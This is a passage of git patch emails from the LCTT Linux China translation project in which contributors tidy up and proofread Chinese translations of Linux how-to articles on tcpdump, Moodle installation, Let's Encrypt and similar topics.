祝你们玩得开心!再见!
-
-
--------------------------------------------------------------------------------
via: https://www.ostechnix.com/colossal-cave-adventure-famous-classic-text-based-adventure-game/
作者:[SK][a]
译者:[yixunx](https://github.com/yixunx)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From bac5b530f286b0b8c424efde6008c4b4ab73cb5f Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 7 Jan 2018 01:14:39 +0800
Subject: [PATCH 112/371] PUB:20171214 The Most Famous Classic Text-based
Adventure Game.md
@yixunx https://linux.cn/article-9209-1.html
---
.../20171214 The Most Famous Classic Text-based Adventure Game.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20171214 The Most Famous Classic Text-based Adventure Game.md (100%)
diff --git a/translated/tech/20171214 The Most Famous Classic Text-based Adventure Game.md b/published/20171214 The Most Famous Classic Text-based Adventure Game.md
similarity index 100%
rename from translated/tech/20171214 The Most Famous Classic Text-based Adventure Game.md
rename to published/20171214 The Most Famous Classic Text-based Adventure Game.md
From 94745a45ce210a26ff09b3a4ff2707a00775612a Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 03:01:37 +0800
Subject: [PATCH 113/371] remove useless links
---
...eate an e-book chapter template in LibreOffice Writer.md | 6 ------
1 file changed, 6 deletions(-)
diff --git a/sources/tech/20171018 How to create an e-book chapter template in LibreOffice Writer.md b/sources/tech/20171018 How to create an e-book chapter template in LibreOffice Writer.md
index 7b0a5bd1c5..8c6a5c8072 100644
--- a/sources/tech/20171018 How to create an e-book chapter template in LibreOffice Writer.md
+++ b/sources/tech/20171018 How to create an e-book chapter template in LibreOffice Writer.md
@@ -36,7 +36,6 @@ Like the template itself, styles provide a consistent look and feel for your doc
The standard LibreOffice template comes with a number of styles that you can fiddle with to suit your needs. To do that, press **F11** to open the **Styles and Formatting** window.
-### [lo-paragraph-style.png][3]
![LibreOffice styles and formatting][4]
@@ -47,7 +46,6 @@ Right-click on a style and select **Modify** to edit it. Here are the main style
Style Font Spacing/Alignment Heading 1 Liberation Sans, 36 pt 36 pt above, 48 pt below, aligned left Heading 2 Liberation Sans, 18 pt 12 pt above, 12 pt below, aligned left Heading 3 Liberation Sans, 14 pt 12 pt above, 12 pt below, aligned left Text Body Liberation Sans, 12 pt 12 pt above, 12 pt below, aligned left Footer Liberation Sans, 10 pt Aligned center
-### [lo-styles-in-action.png][5]
![LibreOffice styles in action][6]
@@ -70,7 +68,6 @@ Before you start writing, create a folder on your computer that will hold all th
When you're ready to write, fire up LibreOffice Writer and select **File > New > Templates**. Then select your template from the list and click **Open**.
-### [lo-template-list.png][7]
![LibreOffice Writer template list][8]
@@ -109,13 +106,10 @@ via: https://opensource.com/article/17/10/creating-ebook-chapter-template-libreo
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
[a]:https://opensource.com/users/scottnesbitt
-[1]:/file/374456
[2]:https://opensource.com/sites/default/files/images/life-uploads/lo-page-style.png (LibreOffice Page Style window)
-[3]:/file/374461
[4]:https://opensource.com/sites/default/files/images/life-uploads/lo-paragraph-style.png (LibreOffice styles and formatting window)
[5]:/file/374466
[6]:https://opensource.com/sites/default/files/images/life-uploads/lo-styles-in-action.png (Example of LibreOffice styles)
-[7]:/file/374471
[8]:https://opensource.com/sites/default/files/images/life-uploads/lo-template-list.png (Template list - LibreOffice Writer)
[9]:https://help.libreoffice.org/Writer/Working_with_Master_Documents_and_Subdocuments
[10]:https://help.libreoffice.org/Common/Export_as_PDF
From 8c1e5294728bdc87878dd02785a1c8058b81ad45 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 03:18:38 +0800
Subject: [PATCH 114/371] =?UTF-8?q?=E9=87=8D=E6=96=B0=E6=8E=92=E7=89=88?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md b/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
index 1cc43f9627..7a0e9b4805 100644
--- a/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
+++ b/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
@@ -1,6 +1,7 @@
A beginner’s guide to Raspberry Pi 3
======
![](https://images.techhive.com/images/article/2017/03/raspberry2-100711632-large.jpeg)
+
This article is part of a weekly series where I'll create new projects using Raspberry Pi 3. The first article of the series focusses on getting you started and will cover the installation of Raspbian, with PIXEL desktop, setting up networking and some basics.
### What you need:
@@ -20,8 +21,6 @@ There are many Linux-based operating systems available for Raspberry Pi that you
Download NOOBS from [this link][1] on your system. It's a compressed .zip file. If you're on MacOS, just double click on it and MacOS will automatically uncompress the files. If you are on Windows, right-click on it, and select "extract here."
- **[ Give yourself a technology career advantage with[InfoWorld's Deep Dive technology reports and Computerworld's career trends reports][2]. GET A 15% DISCOUNT through Jan. 15, 2017: Use code 8TIISZ4Z. ]**
-
If you're running desktop Linux, then how to unzip it really depends on the desktop environment you are running, as different DEs have different ways of doing the same thing. So the easiest way is to use the command line.
`$ unzip NOOBS.zip`
From 5aa9b7acbfa93245ea750ae888812b6ef9f1ee51 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 03:23:29 +0800
Subject: [PATCH 115/371] =?UTF-8?q?=E6=98=BE=E7=A4=BA=E9=85=8D=E5=9B=BE?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...4 The Best Linux Apps - Distros of 2017.md | 22 +++++++++----------
1 file changed, 11 insertions(+), 11 deletions(-)
diff --git a/sources/tech/20171214 The Best Linux Apps - Distros of 2017.md b/sources/tech/20171214 The Best Linux Apps - Distros of 2017.md
index 1491ff1157..11bf2b558a 100644
--- a/sources/tech/20171214 The Best Linux Apps - Distros of 2017.md
+++ b/sources/tech/20171214 The Best Linux Apps - Distros of 2017.md
@@ -1,6 +1,6 @@
The Best Linux Apps & Distros of 2017
======
-[![best linux distros 2017][1]][2]
+![best linux distros 2017][1]
**In this post we look back at the best Linux distro and app releases that helped define 2017.**
@@ -18,7 +18,7 @@ But enough waffle: on we go!
## Distros
-### 1\. Ubuntu 17.10 'Artful Aardvark'
+### 1. Ubuntu 17.10 'Artful Aardvark'
[![Ubuntu 17.10 desktop screenshot][3]][4]
@@ -40,7 +40,7 @@ The recurring theme among the [Ubuntu 17.10 reviews][9] was the Artful Aardvark
And with an long-term support release next up, long may the enthusiasm for it continue!
-### 2\. Solus 3
+### 2. Solus 3
[![][10]][11]
@@ -60,7 +60,7 @@ If you like the look of Budgie you can use it on Ubuntu without damaging your ex
If you get bored over the holidays I highly recommended you [download the Solus MATE edition][15] too. It combines the strength of Solus with the meticulously maintained MATE desktop, a combination that works incredibly well together.
-### 3\. Fedora 27
+### 3. Fedora 27
[![][16]][17]
@@ -72,7 +72,7 @@ Fedora 27 features GNOME 3.26 (and all the niceties that brings, like color emoj
## Apps
-### 4\. Firefox 57 (aka 'Firefox Quantum').
+### 4. Firefox 57 (aka 'Firefox Quantum').
[![firefox quantum on ubuntu][20]][21]
@@ -88,7 +88,7 @@ Like Ubuntu, Firefox has got its mojo back.
Firefox will roll out support for client side decoration on the GNOME desktop (a feature already available in the latest nightly builds) sometime in 2018. This feature, along with further refinements to the finely-tuned under-the-hood mechanics, will add more icing atop an already fantastic base!
-### 5\. Ubuntu for Windows
+### 5. Ubuntu for Windows
[![][22]][23]
@@ -106,7 +106,7 @@ The stocking of Ubuntu, openSUSE and Fedora on the shelves of the Windows Store
For many regular Linux will always be preferable to the rather odd hybrid that is the Windows Subsystem for Linux (WSL). But for others, mandated to use Microsoft products for work or study, the leeway to use Linux is a blessing.
-### 6\. GIMP 2.9.6
+### 6. GIMP 2.9.6
[![gimp on ubuntu graphic][25]][26]
@@ -116,7 +116,7 @@ While GIMP 2.10 itself didn't see release in 2017 two sizeable development updat
The former of these added ** experimental multi-threading in GEGL** (a fancy way of saying the app can now make better use of multi-core processors). It also added HiDPI tweaks, introduced color coded layer tags, added metadata editor, new filters, crop presets and -- take a breath -- improved the 'quit' dialog.
-### 7\. GNOME Desktop
+### 7. GNOME Desktop
[![GNOME 3.26 desktop with apps][28]][29]
@@ -130,7 +130,7 @@ Both release came packed full of new features, and both bought an assembly of re
GNOME isn't stopping there. GNOME 3.28 is due for release in March with plenty more changes, improvements and app updates planned. GNOME 3.28 is looking like it will be used in Ubuntu 18.04 LTS.
-### 8\. Atom IDE
+### 8. Atom IDE
[![Atom IDE][32]][32]
@@ -140,7 +140,7 @@ But, for me, it was rather sudden appearance of **Atom IDE ** that caught my att
[Atom IDE][33] is a set of packages for the Atom code editor that add more traditional [IDE][34] capabilities like context-aware auto-completion, code navigation, diagnostics, and document formatting.
-### 9\. Stacer 1.0.8
+### 9. Stacer 1.0.8
[![Stacer is an Ubuntu cleaner app][35]][36]
@@ -159,7 +159,7 @@ Stacer has 8 dedicated sections offering control over system maintenance duties,
The app is now my go-to recommendation for anyone looking for an Ubuntu system cleaner. Which reminds me: I should get around to adding the app to our list of ways to [free up space on Ubuntu][37]… Chores, huh?!
-### 10\. Geary 0.12
+### 10. Geary 0.12
[![Geary 0.11 on Ubuntu 16.04][38]][39]
From 43f49484c8c51edf935f561f38d6e79a16840b9f Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 03:28:38 +0800
Subject: [PATCH 116/371] =?UTF-8?q?=E9=85=8D=E5=9B=BE?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
sources/tech/20171214 IPv6 Auto-Configuration in Linux.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/sources/tech/20171214 IPv6 Auto-Configuration in Linux.md b/sources/tech/20171214 IPv6 Auto-Configuration in Linux.md
index 85108d8b6f..547b404b82 100644
--- a/sources/tech/20171214 IPv6 Auto-Configuration in Linux.md
+++ b/sources/tech/20171214 IPv6 Auto-Configuration in Linux.md
@@ -1,7 +1,7 @@
IPv6 Auto-Configuration in Linux
======
-![](http://www.omgubuntu.co.uk)
+![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/banner_5.png?itok=3kN83IjL)
In [Testing IPv6 Networking in KVM: Part 1][1], we learned about unique local addresses (ULAs). In this article, we will learn how to set up automatic IP address configuration for ULAs.
From c484b89530558f44d97d7a58b56aaa59ff993a36 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 03:31:04 +0800
Subject: [PATCH 117/371] =?UTF-8?q?fix=20=E5=86=85=E5=AE=B9=E9=97=AE?=
=?UTF-8?q?=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ache SSL certificate with Let-s Encrypt on CentOS - RHEL.md | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/sources/tech/20171212 Create a free Apache SSL certificate with Let-s Encrypt on CentOS - RHEL.md b/sources/tech/20171212 Create a free Apache SSL certificate with Let-s Encrypt on CentOS - RHEL.md
index d6a173336c..1d85d60731 100644
--- a/sources/tech/20171212 Create a free Apache SSL certificate with Let-s Encrypt on CentOS - RHEL.md
+++ b/sources/tech/20171212 Create a free Apache SSL certificate with Let-s Encrypt on CentOS - RHEL.md
@@ -1,5 +1,6 @@
Create a free Apache SSL certificate with Let’s Encrypt on CentOS & RHEL
======
+
Let's Encrypt is a free, automated & open certificate authority that is supported by ISRG, Internet Security Research Group. Let's encrypt provides X.509 certificates for TLS (Transport Layer Security) encryption via automated process which includes creation, validation, signing, installation, and renewal of certificates for secure websites.
In this tutorial, we are going to discuss how to create an apache SSL certificate with Let's Encrypt certificate on Centos/RHEL 6 & 7\. To automate the Let's encrypt process, we will use Let's encrypt recommended ACME client i.e. CERTBOT, there are other ACME Clients as well but we will be using Certbot only.
@@ -95,7 +96,7 @@ For creating a cron job, use
**# crontab -e**
- **0 0 1 * comic core.md Dict.md lctt2014.md lctt2016.md LCTT翻译规范.md LICENSE Makefile published README.md sign.md sources translated 选题模板.txt 中文排版指北.md sh path/certbot-auto renew >> /var/log/letsencrypt.log**
+ **0 0 1 * * sh path/certbot-auto renew >> /var/log/letsencrypt.log**
This was our tutorial on how to install and use let's encrypt on CentOS , RHEL 6 & 7 for creating a free SSL certificate for Apache servers. Please do leave your questions or queries down below.
From 513a6ee32311d35449d7d3824ded453f42e7fef7 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 03:34:25 +0800
Subject: [PATCH 118/371] =?UTF-8?q?=E7=89=88=E6=9D=83=E4=BF=A1=E6=81=AF?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...8 GeckoLinux Brings Flexibility and Choice to openSUSE.md | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/sources/tech/20171208 GeckoLinux Brings Flexibility and Choice to openSUSE.md b/sources/tech/20171208 GeckoLinux Brings Flexibility and Choice to openSUSE.md
index a4e8d9657e..af1ba82706 100644
--- a/sources/tech/20171208 GeckoLinux Brings Flexibility and Choice to openSUSE.md
+++ b/sources/tech/20171208 GeckoLinux Brings Flexibility and Choice to openSUSE.md
@@ -1,6 +1,11 @@
GeckoLinux Brings Flexibility and Choice to openSUSE
======
![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/gecko-linux.jpg?itok=bjKVnW1q)
+
+GeckoLinux is a unique distro that offers a few options that openSUSE does not. Jack Wallen takes a look.
+
+Creative Commons Zero
+
I've been a fan of SUSE and openSUSE for a long time. I've always wanted to call myself an openSUSE user, but things seemed to get in the way--mostly [Elementary OS][1]. But every time an openSUSE spin is released, I take notice. Most recently, I was made aware of [GeckoLinux][2]--a unique take (offering both Static and Rolling releases) that offers a few options that openSUSE does not. Consider this list of features:
* Live DVD / USB image
From 3f01c20cca524f3a8b09bfc6456f797711974f51 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 03:36:49 +0800
Subject: [PATCH 119/371] =?UTF-8?q?=E9=85=8D=E5=9B=BE?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
sources/tech/20171212 Oh My Fish- Make Your Shell Beautiful.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/sources/tech/20171212 Oh My Fish- Make Your Shell Beautiful.md b/sources/tech/20171212 Oh My Fish- Make Your Shell Beautiful.md
index a085692994..2bc4fe93e4 100644
--- a/sources/tech/20171212 Oh My Fish- Make Your Shell Beautiful.md
+++ b/sources/tech/20171212 Oh My Fish- Make Your Shell Beautiful.md
@@ -11,7 +11,7 @@ Installing omf is not a big deal. All you have to do is just run the following c
curl -L https://get.oh-my.fish | fish
```
-[![][2]][3]
+![][3]
Once the installation has completed, you will see the the prompt has automatically changed as shown in the above picture. Also, you will notice that the current time on the right of the shell window.
From e88a235ddc5c9e9a365738b6f900afcefd858fd3 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 03:38:49 +0800
Subject: [PATCH 120/371] fix content bug
---
...ount The Number Of Files And Folders-Directories In Linux.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/sources/tech/20171212 How To Count The Number Of Files And Folders-Directories In Linux.md b/sources/tech/20171212 How To Count The Number Of Files And Folders-Directories In Linux.md
index b3cc45af13..9e8de9c467 100644
--- a/sources/tech/20171212 How To Count The Number Of Files And Folders-Directories In Linux.md
+++ b/sources/tech/20171212 How To Count The Number Of Files And Folders-Directories In Linux.md
@@ -121,7 +121,7 @@ To experiment this, i'm going to create totally 7 files and 2 folders (5 regular
**Example-10 :** Count all files in the current directory by using the echo command in combination with the wc command. `4` indicates the amount of files in the current directory.
```
-# echo core.md Dict.md lctt2014.md lctt2016.md LCTT翻译规范.md README.md sign.md 选题模板.txt 中文排版指北.md | wc
+# echo * | wc
1 4 39
```
From 236b2a6cf4540be6b67ef159cdec06063da52ec3 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 03:40:13 +0800
Subject: [PATCH 121/371] =?UTF-8?q?=E9=85=8D=E5=9B=BE=E7=89=88=E6=9D=83?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... Essential Questions to Ask at Your Next Tech Interview.md | 4 ++++
1 file changed, 4 insertions(+)
diff --git a/sources/tech/20171203 3 Essential Questions to Ask at Your Next Tech Interview.md b/sources/tech/20171203 3 Essential Questions to Ask at Your Next Tech Interview.md
index 7f90ef282d..891ef48948 100644
--- a/sources/tech/20171203 3 Essential Questions to Ask at Your Next Tech Interview.md
+++ b/sources/tech/20171203 3 Essential Questions to Ask at Your Next Tech Interview.md
@@ -2,6 +2,10 @@
======
![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/os-jobs_0.jpg?itok=nDf5j7xC)
+Interviewing can be stressful, but 58 percent of companies tell Dice and the Linux Foundation that they need to hire open source talent in the months ahead. Learn how to ask the right questions.
+
+The Linux Foundation
+
The annual [Open Source Jobs Report][1] from Dice and The Linux Foundation reveals a lot about prospects for open source professionals and hiring activity in the year ahead. In this year's report, 86 percent of tech professionals said that knowing open source has advanced their careers. Yet what happens with all that experience when it comes time for advancing within their own organization or applying for a new roles elsewhere?
Interviewing for a new job is never easy. Aside from the complexities of juggling your current work while preparing for a new role, there's the added pressure of coming up with the necessary response when the interviewer asks "Do you have any questions for me?"
From 3dded768307551dcab0491c23b0a8b6195d7ec25 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 7 Jan 2018 09:28:59 +0800
Subject: [PATCH 122/371] PRF:20171109 Learn how to use tcpdump command with
examples.md
@lujun9972
---
...ow to use tcpdump command with examples.md | 65 ++++++++++---------
1 file changed, 33 insertions(+), 32 deletions(-)
diff --git a/translated/tech/20171109 Learn how to use tcpdump command with examples.md b/translated/tech/20171109 Learn how to use tcpdump command with examples.md
index 578580ef4c..b683dd0005 100644
--- a/translated/tech/20171109 Learn how to use tcpdump command with examples.md
+++ b/translated/tech/20171109 Learn how to use tcpdump command with examples.md
@@ -1,20 +1,21 @@
-通过案例学习 TCPDUMP 命令
+通过实例学习 tcpdump 命令
======
-Tcpdump 是一个很常用的网络包分析工具,可以用来显示通过网络传输到本系统的 TCP\IP 以及其他网络的数据包。Tcpdump 使用 libpcap 库来抓取网络报,这个库在几乎存在于所有的 Linux/Unix 中。
-Tcpdump 可以从网卡或之前创建的数据包文件中读取内容,也可以将包写入文件中以供后续使用。必须是 root 用户或者使用 sudo 特权来运行 tcpdump。
+`tcpdump` 是一个很常用的网络包分析工具,可以用来显示通过网络传输到本系统的 TCP/IP 以及其他网络的数据包。`tcpdump` 使用 libpcap 库来抓取网络报,这个库在几乎在所有的 Linux/Unix 中都有。
-在本文中,我们将会通过一些案例来演示如何使用 tcpdump 命令,但首先让我们来看看在各种 Linux 操作系统中是如何安装 tcpdump 的。
+`tcpdump` 可以从网卡或之前创建的数据包文件中读取内容,也可以将包写入文件中以供后续使用。必须是 root 用户或者使用 sudo 特权来运行 `tcpdump`。
- **(推荐阅读:[使用 iftop 命令监控网络带宽 ][1])**
+在本文中,我们将会通过一些实例来演示如何使用 `tcpdump` 命令,但首先让我们来看看在各种 Linux 操作系统中是如何安装 `tcpdump` 的。
+
+- 推荐阅读:[使用 iftop 命令监控网络带宽 ][1]
### 安装
-tcpdump 默认在几乎所有的 Linux 发行版中都可用,但若你的 Linux 上没有的话,使用下面方法进行安装。
+`tcpdump` 默认在几乎所有的 Linux 发行版中都可用,但若你的 Linux 上没有的话,使用下面方法进行安装。
#### CentOS/RHEL
-使用下面命令在 CentOS 和 RHEL 上安装 tcpdump,
+使用下面命令在 CentOS 和 RHEL 上安装 `tcpdump`,
```
$ sudo yum install tcpdump*
@@ -22,7 +23,7 @@ $ sudo yum install tcpdump*
#### Fedora
-使用下面命令在 Fedora 上安装 tcpdump,
+使用下面命令在 Fedora 上安装 `tcpdump`:
```
$ dnf install tcpdump
@@ -30,19 +31,19 @@ $ dnf install tcpdump
#### Ubuntu/Debian/Linux Mint
-在 Ubuntu/Debain/Linux Mint 上使用下面命令安装 tcpdump
+在 Ubuntu/Debain/Linux Mint 上使用下面命令安装 `tcpdump`:
```
$ apt-get install tcpdump
```
-安装好 tcpdump 后,现在来看一些例子。
+安装好 `tcpdump` 后,现在来看一些例子。
### 案例演示
#### 从所有网卡中捕获数据包
-运行下面命令来从所有网卡中捕获数据包,run the following command,
+运行下面命令来从所有网卡中捕获数据包:
```
$ tcpdump -i any
@@ -50,7 +51,7 @@ $ tcpdump -i any
#### 从指定网卡中捕获数据包
-要从指定网卡中捕获数据包,运行
+要从指定网卡中捕获数据包,运行:
```
$ tcpdump -i eth0
@@ -58,7 +59,7 @@ $ tcpdump -i eth0
#### 将捕获的包写入文件
-使用 ‘-w’ 选项将所有捕获的包写入文件,
+使用 `-w` 选项将所有捕获的包写入文件:
```
$ tcpdump -i eth1 -w packets_file
@@ -66,15 +67,15 @@ $ tcpdump -i eth1 -w packets_file
#### 读取之前产生的 tcpdump 文件
-使用下面命令从之前创建的 tcpdump 文件中读取内容
+使用下面命令从之前创建的 tcpdump 文件中读取内容:
```
$ tcpdump -r packets_file
```
-#### 获取更多的包信息并且以可读的形式显示时间戳
+#### 获取更多的包信息,并且以可读的形式显示时间戳
-要获取更多的包信息同时以可读的形式显示时间戳,使用
+要获取更多的包信息同时以可读的形式显示时间戳,使用:
```
$ tcpdump -ttttnnvvS
@@ -82,7 +83,7 @@ $ tcpdump -ttttnnvvS
#### 查看整个网络的数据包
-要获取整个网络的数据包,在终端执行下面命令
+要获取整个网络的数据包,在终端执行下面命令:
```
$ tcpdump net 192.168.1.0/24
@@ -90,13 +91,13 @@ $ tcpdump net 192.168.1.0/24
#### 根据 IP 地址查看报文
-要获取指定 IP 的数据包,不管是作为源地址还是目的地址,使用下面命令,
+要获取指定 IP 的数据包,不管是作为源地址还是目的地址,使用下面命令:
```
$ tcpdump host 192.168.1.100
```
-要指定 IP 地址是源地址或是目的地址则使用
+要指定 IP 地址是源地址或是目的地址则使用:
```
$ tcpdump src 192.168.1.100
@@ -105,43 +106,43 @@ $ tcpdump dst 192.168.1.100
#### 查看某个协议或端口号的数据包
-要查看某个协议的数据包,运行下面命令
+要查看某个协议的数据包,运行下面命令:
```
$ tcpdump ssh
```
-要捕获某个端口或一个范围的数据包,使用
+要捕获某个端口或一个范围的数据包,使用:
```
$ tcpdump port 22
$ tcpdump portrange 22-125
```
-我们也可以与 'src' 和 'dst' 选项连用来捕获指定源端口或指定目的端口的报文
+我们也可以与 `src` 和 `dst` 选项连用来捕获指定源端口或指定目的端口的报文。
-我们还可以使用 AND (与,&& ),OR ( 或。|| ) & EXCEPT (非,!) 来将两个条件组合起来。当我们需要基于某些条件来分析网络报文是非常有用。
+我们还可以使用“与” (`and`,`&&`)、“或” (`or`,`||` ) 和“非”(`not`,`!`) 来将两个条件组合起来。当我们需要基于某些条件来分析网络报文是非常有用。
-#### 使用 AND
+#### 使用“与”
-可以使用 'and' 或者符号 '&&' 来将两个或多个条件组合起来。比如,
+可以使用 `and` 或者符号 `&&` 来将两个或多个条件组合起来。比如:
```
$ tcpdump src 192.168.1.100 && port 22 -w ssh_packets
```
-#### 使用 OR
+#### 使用“或”
-OR 会检查是否匹配命令所列条件中的其中一条,像这样
+“或”会检查是否匹配命令所列条件中的其中一条,像这样:
```
$ tcpdump src 192.168.1.100 or dst 192.168.1.50 && port 22 -w ssh_packets
$ tcpdump port 443 or 80 -w http_packets
```
-#### 使用 EXCEPT
+#### 使用“非”
-当我们想表达不匹配某项条件时可以使用 EXCEPT,像这样
+当我们想表达不匹配某项条件时可以使用“非”,像这样:
```
$ tcpdump -i eth0 src port not 22
@@ -149,15 +150,15 @@ $ tcpdump -i eth0 src port not 22
这会捕获 eth0 上除了 22 号端口的所有通讯。
-我们的教程至此就结束了,在本教程中我们讲解了如何安装并使用 tcpdump 来捕获网络数据包。如有任何疑问或建议,欢迎留言。
+我们的教程至此就结束了,在本教程中我们讲解了如何安装并使用 `tcpdump` 来捕获网络数据包。如有任何疑问或建议,欢迎留言。
--------------------------------------------------------------------------------
via: http://linuxtechlab.com/learn-use-tcpdump-command-examples/
-作者:[Shusain ][a]
+作者:[Shusain][a]
译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From 695b2ceff1c34d4bc4b4ebb31c8695eb65d2668c Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 7 Jan 2018 09:29:30 +0800
Subject: [PATCH 123/371] PUB:20171109 Learn how to use tcpdump command with
examples.md
@lujun9972 https://linux.cn/article-9210-1.html
---
.../20171109 Learn how to use tcpdump command with examples.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20171109 Learn how to use tcpdump command with examples.md (100%)
diff --git a/translated/tech/20171109 Learn how to use tcpdump command with examples.md b/published/20171109 Learn how to use tcpdump command with examples.md
similarity index 100%
rename from translated/tech/20171109 Learn how to use tcpdump command with examples.md
rename to published/20171109 Learn how to use tcpdump command with examples.md
From c0f7c0fbfb0762e1ac05f6d10a40b64fe4a7bdd1 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 7 Jan 2018 09:47:12 +0800
Subject: [PATCH 124/371] PRF:20171214 How to Install Moodle on Ubuntu 16.04.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@stevenzdg988 这篇用心了。不过一些显而易见的说明可以不加,要加也也请以 “(LCTT
译注:XXXX)”的形式在合适的位置加上即可。
---
...4 How to Install Moodle on Ubuntu 16.04.md | 111 +++++++++++-------
1 file changed, 67 insertions(+), 44 deletions(-)
diff --git a/translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md b/translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
index 0422dbb2c3..0a0286f661 100644
--- a/translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
+++ b/translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
@@ -1,62 +1,76 @@
-怎样在 Ubuntu 16.04 下安装 Moodle(“魔灯”)
+怎样在 Ubuntu 下安装 Moodle(“魔灯”)
======
-![怎样在 Ubuntu 16.04 下安装 Moodle```“魔灯”```][1]
-关于如何在 Ubuntu 16.04 上按照指南逐步安装 Moodle 请继续往下看。Moodle (模块化面向对象动态学习环境的简称)是一种免费开源学习管理系统,为教师、学生和管理员提供个性化的学习环境。Moodle 由 Moodle 项目创建,由 [Moodle 总部][2]统一领导和协调。
+![怎样在 Ubuntu 16.04 下安装 Moodle “魔灯”][1]
-**Moodle有很多非常实用的功能,比如:**
+这是一篇关于如何在 Ubuntu 16.04 上安装 Moodle (“魔灯”)的逐步指南。Moodle (模块化面向对象动态学习环境的缩写)是一种自由而开源的学习管理系统,为教师、学生和管理员提供个性化的学习环境。Moodle 由 Moodle 项目创建,由 [Moodle 总部][2]统一领导和协调。
- * 现代和易于使用的界面
- * 个性化仪表盘
- * 协作工具和活动
- * 一体式日历
- * 简单的文本编辑器
- * 进度跟踪
- * 公告
- * 不胜枚举…
+Moodle 有很多非常实用的功能,比如:
-在本教程中,我们将指导您在 Ubuntu 16.04 VPS 上利用 Apache web服务器、MySQL 和 PHP 7 安装最新版本的 Moodle。
-### 1. 通过 SSH 登录
+* 现代和易于使用的界面
+* 个性化仪表盘
+* 协作工具和活动
+* 一体式日历
+* 简单的文本编辑器
+* 进度跟踪
+* 公告
+* 不胜枚举…
-First of all, login to your Ubuntu 16.04 VPS via SSH as user root
-首先,利用```root(是 Linux 和 Unix 系统中的超级管理员用户帐户,该帐户拥有整个系统至高无上的权力,所有对象他都可以操作。)```用户通过 SSH 登录到 Ubuntu 16.04 VPS
-### 2. 更新操作系统软件包
+在本教程中,我们将指导您在 Ubuntu 16.04 VPS 上利用 Apache web 服务器、MySQL 和 PHP 7 安装最新版本的 Moodle。(LCTT 译注:在 Ubuntu 的后继版本上的安装也类似。)
+
+### 1、 通过 SSH 登录
+
+首先,利用 root 用户通过 SSH 登录到 Ubuntu 16.04 VPS:
+
+```
+ssh root@IP_Address -p Port_number
+```
+
+### 2、 更新操作系统软件包
+
+运行以下命令更新系统软件包并安装一些依赖软件:
-运行以下命令更新系统软件包并安装一些依赖软件
```
apt-get update && apt-get upgrade
apt-get install git-core graphviz aspell
```
-### 3. 安装 Apache Web Server```(Apache WEB 服务器)```
+### 3、 安装 Apache Web 服务器
+
+利用下面命令,从 Ubuntu 软件仓库安装 Apache Web 服务器:
-利用下面命令,从 Ubuntu 软件仓库安装 Apache Web 服务器
```
apt-get install apache2
```
-### 4. 启动 Apache Web Server
+### 4、 启动 Apache Web 服务器
一旦安装完毕,启动 Apache 并使它能够在系统启动时自动启动,利用下面命令:
+
```
systemctl enable apache2
```
-### 5. 安装 PHP 7
+### 5、 安装 PHP 7
接下来,我们将安装 PHP 7 和 Moodle 所需的一些额外的 PHP 模块,命令是:
+
```
